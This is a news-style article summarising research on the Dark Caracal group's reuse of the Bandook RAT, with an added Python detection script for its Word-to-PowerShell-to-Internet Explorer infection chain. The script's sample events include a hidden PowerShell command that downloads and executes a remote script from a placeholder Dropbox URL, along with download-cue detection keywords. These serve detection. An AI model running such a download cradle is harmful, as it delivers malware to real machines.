A recently released report by Check Point Research reveals a resurgence of cyberattacks linked to a cyberespionage group said to be affiliated with the Kazakh and Lebanese governments. This group has revisited a 13-year-old backdoor Trojan, modifying it for current use against various sectors.

Known as Dark Caracal, the hackers have reportedly deployed numerous digitally signed variants of the Bandook Windows Trojan in their operations over the past year, effectively reigniting interest in this older malware family.

The group’s targets span a wide array of sectors, including government, finance, energy, food services, healthcare, education, IT, and legal institutions, operating across countries such as Chile, Cyprus, Germany, Indonesia, Italy, Singapore, Switzerland, Turkey, and the United States.

This expansive targeting suggests that the malware was not developed for a single customer but is more likely part of an offensive toolkit sold to various governments and threat actors around the globe. Researchers hypothesize that the malware is one element of a broader offensive cyber infrastructure.

Dark Caracal’s use of the Bandook RAT for global espionage was first documented by the Electronic Frontier Foundation and Lookout in early 2018. The group has been implicated in the theft of proprietary corporate data and personally identifiable information across over 21 countries.

The group behind these operations is believed to be connected to the Lebanese General Directorate of General Security, a link that places it in the category of an advanced persistent threat (APT) tied to nation-state activity. This connection implies the sophisticated capabilities and resources typically associated with state-sponsored operations.

Recent reports indicate that Dark Caracal has re-emerged with an updated version of Bandook that includes measures to evade detection and analysis. This new variant employs a three-stage infection chain, beginning with a decoy Microsoft Word document packaged within a ZIP file. Upon opening, malicious macros are triggered to download a PowerShell script, which, in turn, retrieves encoded executable components hosted on cloud storage services like Dropbox or Bitbucket. Eventually, these components are used to inject the RAT into a new Internet Explorer process.
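The infection chain above leaves a recognizable trail in process-creation telemetry: Word launching PowerShell, a PowerShell command line that fetches content from a public cloud store, and a fresh Internet Explorer process started from that script chain. The following detection sketch is an added example written for this article; it is not code from the Check Point report or from Dark Caracal's tooling. It assumes a simplified, Sysmon-like event format (`pid`, `ppid`, image path, command line) and uses constructed sample events; the host names, paths and command lines in the sample are placeholders, not indicators from the report.

```python
"""Detection sketch for the three-stage delivery chain described above:
decoy Word document -> PowerShell downloader -> cloud-hosted payload ->
new Internet Explorer process used as the injection host.

Event format and SAMPLE_EVENTS are constructed for this example (simplified
process-creation log); they are not indicators from the Check Point report.
"""
from dataclasses import dataclass
from typing import Dict, List

# Cloud storage services named in the report as payload hosts.
CLOUD_HOSTS = ("dropbox.com", "bitbucket.org")
# Common PowerShell download cues; presence of one plus a cloud host is the signal.
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the created process
    cmdline: str  # command line as logged


def _basename(path: str) -> str:
    """Lower-cased file name of an image path (handles Windows separators)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk the parent chain, nearest parent first; stops on a missing parent or a cycle."""
    out, seen, cur = [], set(), by_pid.get(ev.ppid)
    while cur and cur.pid not in seen:
        out.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return out


def detect_bandook_chain(events: List[ProcEvent]) -> Dict[str, List[int]]:
    """Return the PIDs matching each stage of the chain."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[str, List[int]] = {
        "office_spawns_powershell": [],
        "cloud_download": [],
        "ie_from_script_chain": [],
    }
    for ev in events:
        name = _basename(ev.image)
        parent_names = [_basename(p.image) for p in ancestors(ev, by_pid)]
        cmd = ev.cmdline.lower()
        # Stage 1: the macro in the decoy document launches PowerShell.
        if name == "powershell.exe" and parent_names and parent_names[0] == "winword.exe":
            hits["office_spawns_powershell"].append(ev.pid)
        # Stage 2: the script retrieves encoded components from a public cloud store.
        if (name == "powershell.exe"
                and any(h in cmd for h in CLOUD_HOSTS)
                and any(c in cmd for c in DOWNLOAD_CUES)):
            hits["cloud_download"].append(ev.pid)
        # Stage 3: a new Internet Explorer process descends from the script chain
        # (the ancestor walk tolerates an intermediate loader executable).
        if name == "iexplore.exe" and "powershell.exe" in parent_names:
            hits["ie_from_script_chain"].append(ev.pid)
    return hits


def chain_severity(hits: Dict[str, List[int]]) -> int:
    """Number of distinct stages observed; 3 means the full chain was seen."""
    return sum(1 for v in hits.values() if v)


# Constructed sample telemetry: one full chain plus a benign, user-launched IE.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\user\Downloads\decoy.docx"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://www.dropbox.com/s/PLACEHOLDER/stage2.txt?dl=1')\""),
    ProcEvent(400, 300, r"C:\Users\user\AppData\Local\Temp\loader.exe", "loader.exe"),
    ProcEvent(500, 400, r"C:\Program Files\Internet Explorer\iexplore.exe", "iexplore.exe"),
    ProcEvent(600, 100, r"C:\Program Files\Internet Explorer\iexplore.exe", "iexplore.exe"),
]

if __name__ == "__main__":
    found = detect_bandook_chain(SAMPLE_EVENTS)
    print(found, "severity:", chain_severity(found))
```

Each stage on its own is noisy (administrators do launch PowerShell that talks to Dropbox), so the useful signal is the severity count: the three stages co-occurring on one host within a short window is what distinguishes this chain from routine activity.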

The Bandook RAT, commercially available since 2007, typically allows remote operators to issue commands ranging from capturing images to performing various file manipulations. However, the latest iteration seems to be a streamlined model, designed to execute only 11 commands, a significant reduction from its previous versions, which supported up to 120 commands. This suggests an operational shift aimed at minimizing the malware’s visibility during high-profile attacks.

The research also highlights that valid code-signing certificates from Certum were used to sign this modified version of the malware, demonstrating an evolving sophistication in the attackers’ tactics. Additionally, researchers identified further samples of digitally signed and unsigned variants, indicating that this malware could be sold by a single entity.

The insights gained from this incident provide valuable context for understanding potential tactics and techniques employed in these attacks, aligned with the MITRE ATT&CK framework. Initial access methods likely include the use of phishing techniques through the malicious document, while persistence may be achieved via the RAT’s ability to maintain connections to remote servers. Such revelations underscore the growing complexity and breadth of cyber threats facing various industries today.
